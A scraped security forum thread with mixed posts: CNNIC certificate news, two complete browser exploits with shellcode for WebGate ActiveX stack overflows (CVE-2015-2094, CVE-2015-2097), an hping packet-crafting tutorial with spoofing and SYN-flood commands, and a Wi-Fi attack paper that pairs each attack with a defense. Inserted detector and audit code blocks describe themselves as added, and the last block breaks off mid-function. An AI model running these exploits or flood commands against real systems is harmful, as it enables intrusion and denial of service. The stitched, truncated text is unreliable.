blog post. As a consequence of the incident, all Mozilla products – including the Firefox web browser and the Thunderbird email client, among others – will be updated so that all CNNIC-based certificates issued on or after April 1, 2015 are considered untrusted. Mozilla said it also plans to ask CNNIC for a comprehensive list of all of its current valid certificates. Any certificates issued before April 1 that are not included on this whitelist will also be subject to potential "further action." The move comes following a similar action by Google, which said on Wednesday that it would stop recognizing the CNNIC certificate authority in a future update to its Chrome browser. 
As a result of these actions, Chrome and Firefox users who try to connect via encrypted HTTPS to websites that use CNNIC-issued SSL certificates will see alert messages warning them that their connections may not be secure – even for online banks, e-commerce shops, and other sites that manage sensitive information. CNNIC, which manages both China's .cn country code top-level domain and the system of internationalized domain names that contain Chinese characters, issued a declaration on Thursday condemning Google's ban:

1. The decision that Google has made is unacceptable and unintelligible to CNNIC, and meanwhile CNNIC sincerely urge that Google would take users' rights and interests into full consideration.
2. For the users that CNNIC has already issued the certificates to, we guarantee that your lawful rights and interests will not be affected.

Mozilla added, though, that CNNIC could regain its standing but only after proving that it could be trusted with the responsibility of managing a root certificate authority. "CNNIC may, if they wish, re-apply for full inclusion in the Mozilla root store and the removal of this restriction, by going through Mozilla's inclusion process after completing additional steps that the Mozilla community may require as a result of this incident," the nonprofit's security team said. Source
  12. <html> <!-- # Exploit Title: WebGate WinRDS PlaySiteAllChannel Stack Buffer Overflow # Date: 01st April, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36 # Tested on: Windows XP SP3 using IE6/7/8 # CVE : 2015-2094 targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll" prototype = "Sub PlaySiteAllChannel ( ByVal SiteSerialNumber As String )" progid = "WESPPLAYBACKLib.WESPPlaybackCtrl" Tested on IE6/7/8 Author: Praveen Darshanam http://darshanams.blogspot.com/ http://blog.disects.com/ P.S. Do not remove back slashes in shellcode and other variables --> <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'> </object> <script> var arg1 = ""; var arg2 = 1; var arg3 = 1; var nops = ""; var shellcode = ""; var buff2 = ""; for (i=0; i<128; i++) { arg1 += "B"; } var nseh = "\xeb\x10PD"; var seh = "\xa0\xf2\x07\x10"; for (i=0;i<80; i++) { nops += "\x90"; } shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + 
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for (i=0;i<(5000 - (arg1.length + nseh.length + seh.length + nops.length + shellcode.length)); i++) { buff2 += "A"; } fbuff = arg1 + nseh + seh + nops + shellcode + buff2; target.PlaySiteAllChannel(fbuff) </script> </html> Source
13. Some sort of Middle Eastern APT apparently. Volatile Cedar - Analysis of a Global Cyber Espionage Campaign | Check Point Blog Sinkholing Volatile Cedar DGA Infrastructure - Securelist Attached: Source
  14. <html> <!-- # Exploit Title: WESP SDK ChangePassword Stack Overflow # Date: 01st April, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi_htdocs/eng/bbs/zboard.php?id=sdk_pds_eng # Version: WESP SDK (package version 1.2) # Tested on: Windows XP SP3 using IE6/7/8 # CVE : 2015-2097 targetFile = "C:\Windows\System32\WESPSDK\WESPConfig.dll" prototype = "Function ChangePassword ( ByVal oldPwd As String , ByVal newPwd As String ) As Integer" progid = "WESPCONFIGLib.UserItem" Tested on IE6/7/8 Author: Praveen Darshanam http://darshanams.blogspot.com/ http://blog.disects.com/ P.S. Do not remove back slashes in shellcode and other variables --> <object classid='clsid:9B61891E-D876-476E-B1E8-AA662F332004' id='target'> </object> <script> var arg1 = ""; var arg2 = "PraveenD"; var nops = ""; var shellcode = ""; var buff2 = ""; for (i=0; i<248; i++) { arg1 += "B"; } var nseh = "\xeb\x10PD"; //WESPConfig.dll(0x10022f35 = pop pop pop ret) var seh = "\x3d\x2f\x02\x10"; for (i=0;i<80; i++) { nops += "\x90"; } shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + 
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for (i=0;i<(5000 - (arg1.length + nseh.length + seh.length + nops.length + shellcode.length)); i++) { buff2 += "A"; } fbuff = arg1 + nseh + seh + nops + shellcode + buff2; target.ChangePassword(fbuff ,arg2); </script> </html> Source
15. Actually, I already miss filelist; anyway, in 2/3 days it will be 100% up.
16. Packet crafting is the art of creating a packet according to various requirements to carry out attacks and to exploit vulnerabilities in a network. It’s mainly used to penetrate into a network’s structure. There are various vulnerability assessment tools used to craft such packets. As a coin has two sides, these tools could be used by hackers to find the vulnerabilities of a targeted system. Crafting is technically advanced and a complex type of vulnerability exploitation, and it’s difficult to detect and diagnose.

Steps Involved in Packet Crafting

The idea behind crafting is to try to simulate an attack and to identify the properties of a network. They are commonly used to invade firewalls and intrusion detection software. The following are the steps involved in packet crafting:

Packet Assembly: This is the first step involved in packet crafting. In this process, the attacker selects the network to be cracked, collects the possible vulnerability information and creates the packet. The packet should be designed in such a way that it should be invisible while passing through a network. For example, for a packet to be invisible, the source address could be spoofed before sending it to a network.

Packet Editing: In this step, the packets are tested before sending. The packets are edited in such a way that maximum information could be retrieved by injecting a minimum number of packets.

Packet Playing: When the packets are ready, packet playing sends them to the targeted machine and collects the resultant packets for further analysis. If the required information is not obtained, the attacker again moves to the editing phase to modify the packet to obtain the required result.

Packet Analysis: The sent packets are received by the attacker and they are analyzed to extract the information. Various sniffing tools like Wireshark, tcpdump, dsniff, etc. are used for this purpose. This step gives a route to the targeted system, or at least gives attackers enough data to tune up the attack.

Tools For Packet Crafting: Hping, Nemesis, Netcat, Scapy, Socat

Let’s carry out a test to understand the creation and working of a crafted packet and its effect on a firewall.

Test Requirements

Two machines (one with Hping and the other with Snort installed). Working connection between the two machines.

Hping

This is a utility that helps us to assemble and send ICMP, UDP or TCP packets and then display the results. It’s similar to the ping command, but it offers far more options to customize the packet to be sent. This helps to map the firewall set rules of a targeted system.

Snort

Snort is a free network intrusion detection and prevention software. It helps us to carry out real time traffic analysis, packet logging, protocol analysis, content searching, etc. on a network.

Testing

Figure 1: Packet Crafting test setup

Now we are going to check how a packet can be crafted from a system using Hping, and how it can be customized to be invisible in a network. We are using Snort as the IDS in the target machine. This could prove that packet crafting is a serious issue that should be studied to prevent attacks. Firstly install Hping on the source machine. It’s a command line multi-platform software. We are using two Linux machines for the test. The installation package could be downloaded from various websites. The next step is to install the intrusion detection software at the destination end. Download the latest version of Snort with Winpcap and install it on the machine. Winpcap is a driver that helps in collecting packets. After setting up the two machines, establish a connection between them to transfer the packets. Check the connection before sending the packets. These are the steps to set up the test environment.

Now we have to craft the packet using Hping. In Hping there are various arguments to modify the packet to be sent according to the requirement. These could be obtained from the manual page of Hping. Before sending the packet, determine the address of the target machine. Here it is 192.168.0.10. Now write the command for packet creation. Hping is a command line software. For creating the packets, the commands should be given in a perfect way so that the packet penetrates into the targeted system without being detected. An example is given below:

hping 192.168.0.10 --udp --spoof 192.168.1.150

The packets are sent to the UDP port of machine 192.168.0.10 with a spoofed source IP of 192.168.1.150.

Figure 2: Spoofing to UDP port.

Figure 3: Spoofed address on target system hiding original address

Packet crafting could be used to carry out DOS attacks to a targeted machine. This could be done by flooding packets to a predetermined port. The number of packets reaching the port is beyond the managing capacity of that port. This results in the failure of the system, which finally becomes non-responsive to any request made to that particular system.

Port Scanning

Before sending a packet to the system, Hping could be used to carry out a port scan. This helps the attacker to get information on available open ports to carry out the attack easily. The weakest port is selected to gain access to the system.

hping3 -S 192.168.0.10 -p 80 -c 2

This command scans port number 80 of the machine with IP 192.168.0.10. There are even commands to scan all the ports in a machine. This will give the attacker the complete status of the ports in a system.

hping 192.168.0.10 -S -p 22 --rand-source --flood

This command floods port number 22 of the mentioned machine. As the flooding starts, the machine becomes non-responsive. When the flooding is stopped, the machine comes back to its normal state.

Figure 4: Command for flooding a machine

Figure 5: Result displayed by Snort after flooding.

We can see from the above image that a large number of packets have been dumped to the targeted machine within a small amount of time. The IDS software does not detect the packets while the flooding is in process. But as soon as the flooding is stopped, Snort displays only the number of packets received. The traffic created by flooding the packets cannot be handled by the system, which becomes non-responsive. No signatures are generated during the process.

DNS and ICMP Packet Crafting

Domain Name System is the system responsible for resolving domain names. DNS uses port 53 UDP for normal operations and can enlist port 53 TCP for zone transfers and other oversized replies. Once the address is entered into the URL, the browser will try to resolve the IP. If the address is not known, then a DNS request will be sent to the DNS server configured on the client. We could craft such a packet using Hping so that the firewall does not block the packet.

hping -2 -p 53 -E data.dns -d 31 192.168.0.10

Here the packet is sent to port number 53 of the target (192.168.0.10), with the packet containing a file called “data.dns”. The packet size has also been specified as 31.

Figure 6: Sending a file to target’s DNS port

When sending a data file through Hping, the IDS used in the target’s machine does not detect the presence of the attached file. It only displays the total number of packets transmitted and received. Even though it shows unreachable, the packets are received at the target location. Hping can also be used to send ICMP (Internet Control Message Protocol) packets. ICMP packets are usually used to troubleshoot networks and for gathering basic information. These packets could be used to check whether a host is alive or not. In most firewalls, packets like ICMP and DNS requests have the ability to pass by. These crafted ICMP packets help us to pass through the firewall. At the sender’s end, we have to specify the type of packet, destination and other details for proper communication.

hping 192.168.0.11 -d 100 --icmp --file /data.dns

Here the file “data.dns” is sent to the target 192.168.0.11 using an ICMP packet.

Figure 7: File sent using ICMP packet

Using such crafted packets, a traffic firewall could be breached. From the above test, we can agree to the fact that packet crafting is a serious issue that should be taken care of.

References

Snort: 5 Steps to Install and Configure Snort on Linux
LINUX HELP ALL: INSTALLING AND CONFIGURING SNORT ON REDHAT/CENTOS v5.5
Cyber Attacks Explained: Packet Crafting - Open Source For You
Article : Cyber Security Packet crafting : Ethical Hacking Penetration Test Pune,India - Valency Networks
Tools for creating TCP/IP packets | Linux Blog
http://www.securitybistro.com/?p=8881

Source
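The post notes that Snort only reported packet counts during the --rand-source --flood run, so a defender needs a rate and source-diversity check rather than a signature. The following is an added example, not code from the article: a sliding-window SYN flood detector over a constructed, simplified tcpdump-style line format, with a constructed 300-packet sample mimicking the port 22 flood.

```python
"""Rate-based SYN flood detector over constructed tcpdump-style lines.

Line format (a constructed simplification of tcpdump output, not a real
tcpdump grammar): "<epoch> IP <src>.<sport> > <dst>.<dport>: Flags [<flags>]"
"""
import random
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+) IP (?P<src>\S+)\.(?P<sport>\d+) > "
    r"(?P<dst>\S+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]+)\]"
)


def parse_line(line):
    """Return a dict for one constructed tcpdump-style line, or None if it
    does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = float(rec["ts"])
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def detect_syn_floods(lines, window=1.0, threshold=50, local_prefix="192.168.0."):
    """Flag (dst, dport) pairs that receive >= threshold pure SYNs within any
    `window` seconds.  Each alert also reports source diversity (a random-source
    flood shows hundreds of distinct addresses) and how many sources lie outside
    the LAN prefix, which is the tell-tale of a spoofed source such as
    192.168.1.150 arriving at 192.168.0.10 in the post's first example."""
    groups = defaultdict(list)
    for rec in (parse_line(l) for l in lines):
        if rec is not None and rec["flags"] == "S":   # pure SYN only, not SYN-ACK
            groups[(rec["dst"], rec["dport"])].append(rec)

    alerts = []
    for (dst, dport), recs in groups.items():
        recs.sort(key=lambda r: r["ts"])
        peak, j = 0, 0
        for i in range(len(recs)):
            # advance the window start so recs[j..i] spans at most `window` seconds
            while recs[i]["ts"] - recs[j]["ts"] > window:
                j += 1
            peak = max(peak, i - j + 1)
        if peak >= threshold:
            sources = {r["src"] for r in recs}
            alerts.append({
                "dst": dst,
                "dport": dport,
                "peak_per_window": peak,
                "total_syns": len(recs),
                "distinct_sources": len(sources),
                "off_lan_sources": sum(1 for s in sources if not s.startswith(local_prefix)),
            })
    return alerts


def constructed_sample():
    """Constructed capture: one normal handshake to port 80, then 300 SYNs from
    random (mostly off-LAN) sources to port 22 within 0.6 seconds."""
    rng = random.Random(7)
    lines = [
        "1427900000.000 IP 192.168.0.5.51000 > 192.168.0.10.80: Flags [S]",
        "1427900000.010 IP 192.168.0.10.80 > 192.168.0.5.51000: Flags [S.]",
        "1427900000.020 IP 192.168.0.5.51000 > 192.168.0.10.80: Flags [.]",
    ]
    for k in range(300):
        src = ".".join(str(rng.randint(1, 254)) for _ in range(4))
        lines.append(f"{1427900001 + k * 0.002:.3f} IP {src}.{rng.randint(1024, 65535)} "
                     f"> 192.168.0.10.22: Flags [S]")
    return lines


if __name__ == "__main__":
    for alert in detect_syn_floods(constructed_sample()):
        print(alert)
```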
17. It looks like they have posted the solution: n00bs CTF Labs - Solutions! - InfoSec Institute (this is for those interested)
  18. While the access points in organizations are usually under the protection of organization-wide security policies, home routers are less likely to be appropriately configured by their owners in absence of such central control. This provides a window of opportunity to neighboring Wi-Fi hackers. We talk about hacking a neighbor’s Wi-Fi since proximity to the access point is a must for wireless hacking—which is not an issue for a neighbor with an external antenna. With abundance of automated Wi-Fi hacking tools such as ‘Wifite’, it no longer takes a skilled attacker to breach Wi-Fi security. Chances are high that one of your tech-savvy neighbors would eventually exploit a poorly configured access point. The purpose may or may not be malicious; sometimes it may simply be out of curiosity. However, it is best to be aware of and secure your Wi-Fi against attacks from such parties. Tools Used: Aircrack-ng Suite Wireshark Reaver Bully WiFiPhisher Nessus Vulnerability Scanner Attacks Against Access Point Password The choices of attack for a neighboring Wi-Fi hacker vary with different configurations of Wi-Fi access points. Specific Wi-Fi security standards are associated with particular security weaknesses that the attacker would target. Open Hotspots Although rare, open Wi-Fi access points are still extant in certain homes. When open access points are deployed in homes, it could be out of ‘generosity’ towards neighbors or sheer insouciance towards security, or both. It is observed that home users with unlimited bandwidth and data are more likely to leave their access point unsecured, unaware of the security implications. Attack: Open Wi-Fi networks do not encrypt data packets over wireless channels. This means that anyone with a packet capture utility can read unencrypted HTTP, email, and FTP traffic. 
In this case, we captured the traffic pertaining to an open Wi-Fi on channel 1 using ‘Airodump-ng’, and analyzed the captured file in Wireshark, which revealed that a user on the network was logging into his (demo) bank account [Figure 1]. Figure 1 While it is highly unlikely today that a banking website would lack an HTTPS link, this is meant to demonstrate the dangers of using unencrypted Wi-Fi along with unencrypted protocols such as HTTP, FTP, SMTP, etc. Defense: Never leave the access point ‘open’ or unsecured. Access the control panel of the wireless router and configure it to use a complex WPA2 key (explained later in this paper). If you insist on using an open access point, consider using ‘HTTPS Everywhere‘ while browsing. WEP IV Collisions WEP is an outdated security standard vulnerable to statistical attacks due to IV collisions. It offers a false sense of security, and in the wake of WPA2, it is hard to think of a reason why one would want to use it. Attack: Since WEP cracking has been covered on myriad blogs and websites already, we will refrain from going into details of attacks against it. For the intricacies of how such attacks are performed, you may visit this page. Defense: Since the use of WEP is now deprecated due to serious security flaws, you should use WPA2 (AES) instead. WPS Based Attacks WPS PIN is an 8 digit number pertaining to the wireless router. It was meant to liberate users from having to remember complex WPA passwords. The idea was that since WPA is susceptible to dictionary attacks, the user would set a complex WPA passphrase and deploy WPS in order to avoid having to remember the passphrase. After supplying the correct WPS PIN to the router, it would hand over the configuration details to the client—which includes the WPA password. Brute forcing the WPS PIN WPS was implemented incorrectly: Firstly, the last digit of the PIN was a checksum which means the effective size of a WPS PIN is only 7 digits. 
Moreover, the registrar (router) checks the PIN in 2 parts. This means the first part of 4 digits would have 10,000 possible combinations, and the second part of 3 digits would have 1,000 possible combinations. Hence, the attacker would require only 11,000 attempts, in the worst case, to brute force the PIN—which is very feasible. Here, during an experiment, we were able to crack the WPS PIN in under 6 hours using the popular tool ‘reaver’ [Figure 2]. Figure 2 Defense: Make sure you have the latest firmware installed and that your router has a WPS lockout policy (AP rate limiting) after a certain number of unsuccessful attempts. In absence of such lockout policy, turn off WPS in your router. Known WPS PIN The WPS PIN attack becomes incredibly effective and short if the attacker somehow has knowledge of a neighbor’s WPS PIN. Attack: How does the hacker (in this case a neighbor) know the WPS PIN? The PIN is usually written on the bottom of the wireless router. The (evil) neighbor could quickly glance at it during a social visit. Additionally, access points may be left ‘open’ for a certain duration while the user is implementing some router configuration changes or performing a factory reset. This offers a window of opportunity to the attacker to quickly connect to the router, access the control panel (using default credentials), and take note of the WPS PIN [Figure 3]. Figure 3 Once the hacker gains knowledge of the PIN, it could be used to uncover a complex WPA passphrase in seconds. Defense: Scrub off the WPS PIN on the bottom of the wireless router, and avoid leaving your access point ‘open’ at any time. Furthermore, most updated routers will allow the owner to change the WPS PIN from the control panel [Figure 4]. Generate a new WPS PIN periodically. Figure 4 Dictionary Attacks on WPA Handshakes As long as strong, complex WPA passphrases are used to protect the access points, dictionary attacks on WPA handshakes are not really a concern. 
However, every once in a while a user will configure a dictionary word as the WPA password for the sake of simplicity. This leads to successful recovery of passwords from the WPA 4-way handshakes using dictionary attacks. Attack: The attacker seeks to capture the WPA 4-way handshake between a legitimate client and the access point. A dictionary attack is used to recover the plaintext passphrase from this WPA handshake. For the intricacies of this attack, you can visit this page. Defense: Configure complex passphrases that are a combination of special characters, numbers, letters, etc. Never use personal information such as your phone number as the WPA passphrase, as it might be guessed. Wi-Fi Phishing When all else fails, social engineering could always be relied upon to exploit what is often the weakest link in the chain of security—the human element. Phishing is a type of social engineering attack where the user of the Wi-Fi access point could be tricked into revealing the password. Attack: Traditionally, such phishing attacks are carried out over emails; however, in this case even a naïve user would get suspicious if the attacker asks for a WPA password over email. Hence, the best approach is to launch an evil twin attack, make the user join the fake access point, and ask for the password. WiFiPhisher, a python tool, implements this approach. First, the tool prepares the attacker’s machine for the attack. This involves setting up the HTTP and HTTPS servers, detecting the wireless interfaces (wlan0 and wlan1), putting one of these interfaces in monitor mode, and managing DHCP services for IP address allotment [Figure 5]. Figure 5 The tool then detects the Wi-Fi access points in the vicinity and lists them for the attacker [Figure 6]. The attacker then specifies the access point to attack. Figure 6 After the attacker chooses the access point, the tool clones the ESSID and attempts to jam the authentic access point. 
This is important since the attacker wants the users to get de-authenticated from the legitimate network and connect to the evil twin. If the users are not knocked off their authentic access point, or if the attacker’s evil twin access point is too far away for the users to get a strong signal from it, then the attack does not work, since no users will connect to the evil twin. This evil twin access point is now waiting for clients to connect. When a client connects, the attacker is notified that an IP address is allocated to a client. In this case, we notice that an Android device has connected to the evil twin [Figure 7]. Figure 7 Now, it is just a matter of time before this client attempts to access a webpage online. When the client requests a webpage, our HTTP or HTTPS server would serve the phishing page instead. For instance, here the client, the Android device, requested to connect to Google and was served the phishing page instead [Figure 8]. Figure 8 The attacker is notified of the client’s request for the web page and knows now that the client has been served the phishing page [Figure 9]. Figure 9 Moment of truth: either the user gets suspicious and closes the connection, or falls for the con and provides the WPA password as requested [Figure 8]. The user is redirected to an “upgrade-in-progress” page after he submits the WPA password [Figure 10]. Figure 10 Meanwhile, the password is revealed to the attacker over the console [Figure 11]. Figure 11 The user may end up revealing the password due to the following reasons: The user surmises that he is connected to his own legitimate access point. The phishing page is intentionally cloaked to appear as an authentic router page. The user has a curiosity towards the open access point with the same ESSID. Defense: Always be wary of any page asking for a password. Avoid giving out the WPA password over shady pages. 
Aftermath: The Hacker is in Once the attacker has obtained the password and is connected to the access point, he would attempt to explore further. The first point of interest is the router’s control panel. Default credentials: A surprising number of home users do not change the default credentials to their router’s management panel. Router default credentials can be obtained on the Internet, and subsequent access to this management console grants the hacker further privileges on the network. Digging PIN and passwords: Once inside the Wi-Fi management panel, the hacker would note down the WPS PIN and any hidden password for future use. “Hidden” passwords behind asterisks are easy to uncover. For instance, we uncover the ‘admin’ and ‘user’ passwords germane to a router using ‘Inspect element’ in Chrome [Figure 12]. Figure 12 Exploiting clients: Since the attacker is now a part of the local network, he can initiate local scans to glean details of clients, services, ports etc. This allows the attacker to target vulnerabilities pertaining to clients connected to the network [Figure 13]. Figure 13 DNS Manipulation: If the attacker has secured access to the router’s control panel, he can modify the DNS configuration which has severe implications on security. For example, the attacker could plant a fake DNS entry to redirect clients using an online banking service to a rogue server serving phishing pages. Maintaining Access: A persistent neighboring hacker requiring prolonged access to the Wi-Fi access point would want to ensure continued access even after the current password or security protocol is modified later by the owner. Accordingly, the hacker would access the router control panel and take note of the WPS PIN [Figure 4]. More advanced attackers would try to plant a backdoor in the router firmware, such as a master password, that would allow them to access the Wi-Fi at will in the future. 
However, this involves flashing custom firmware, such as DD-WRT, to the router. DD-WRT provides open source router firmware for numerous wireless router models. The attacker would download the appropriate DD-WRT firmware, modify the source code to include a master password or backdoor, and flash this firmware to the router using the router control panel [1] [Figure 14]. Figure 14 Conclusion The purpose of this paper is not to condone hacking your neighbors’ Wi-Fi, rather to apprise owners of common security weaknesses in Wi-Fi configurations and suggest relevant mitigation. “Since I have unlimited data and bandwidth, I do not mind if an unknown person is using my Wi-Fi.” While this generosity is worthy of some appreciation, bandwidth and data usage are not the only concerns when your Wi-Fi is accessed by an unauthorized party. Consider the case where a neighbor attempted to indict the owners after cracking their WEP key and accessing child pornography websites. Since it is your network, the ISP and authorities turn to you while investigating illicit activities. Router manufacturers provide GUI control panels that make it easy for owners to configure their access points. It is best to utilize these interfaces for secure configuration of access points that are capable of thwarting attacks from neighbors.

References
[1] DD-WRT. DD-WRT. [Online]. Development - DD-WRT Wiki
[2] Nikita Borisov, Ian Goldberg, and David Wagner. isaac.cs.berkeley.edu. [Online]. (In)Security of the WEP algorithm
[3] Sean Gallagher. (2014, January) ArsTechnica. [Online]. Backdoor in wireless DSL routers lets attacker reset router, get admin | Ars Technica

Source
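The Defense paragraphs above (open network, WEP, WPS without lockout, dictionary or personal-data passphrases, default management credentials) can be turned into a configuration audit an owner runs against their own router settings. This is an added example and not part of the paper; RouterConfig is a hypothetical flattened view of a router's settings, and the wordlist and default-credential table are constructed stand-ins for real dictionaries and vendor-default lists.

```python
"""Audit a home access point configuration against the weaknesses in the paper.

RouterConfig is a hypothetical, flattened representation of router settings;
COMMON_WORDS and DEFAULT_CREDS are constructed stand-ins for the dictionaries
and vendor-default lists an attacker would actually use.
"""
import string
from dataclasses import dataclass
from typing import List

# Constructed stand-in for a real password dictionary.
COMMON_WORDS = {"password", "sunshine", "welcome", "internet", "qwerty", "letmein"}
# Constructed stand-in for the factory logins that can be looked up online.
DEFAULT_CREDS = {("admin", "admin"), ("admin", "password"), ("admin", ""), ("root", "root")}


@dataclass
class RouterConfig:
    security: str                 # "open", "wep" or "wpa2"
    passphrase: str = ""
    wps_enabled: bool = False
    wps_lockout: bool = False     # AP rate limiting after failed PIN attempts
    admin_user: str = "admin"
    admin_pass: str = ""
    owner_phone: str = ""         # personal data that must not appear in the passphrase


def passphrase_findings(passphrase: str, owner_phone: str = "") -> List[str]:
    """Checks from the dictionary-attack section: dictionary words, personal
    information such as a phone number, and missing character classes."""
    findings = []
    if passphrase.lower() in COMMON_WORDS:
        findings.append("WPA-DICT: passphrase is a dictionary word; a captured "
                        "4-way handshake lets an attacker recover it offline")
    digits = "".join(ch for ch in owner_phone if ch.isdigit())
    if digits and digits in passphrase:
        findings.append("WPA-PERSONAL: passphrase contains the owner's phone number")
    classes = sum(any(ch in cls for ch in passphrase) for cls in
                  (string.ascii_lowercase, string.ascii_uppercase,
                   string.digits, string.punctuation))
    if len(passphrase) < 12 or classes < 3:
        findings.append("WPA-WEAK: use at least 12 characters mixing letters, "
                        "numbers and special characters")
    return findings


def audit_router(cfg: RouterConfig) -> List[str]:
    """Return human-readable findings, each prefixed with a short code."""
    findings = []
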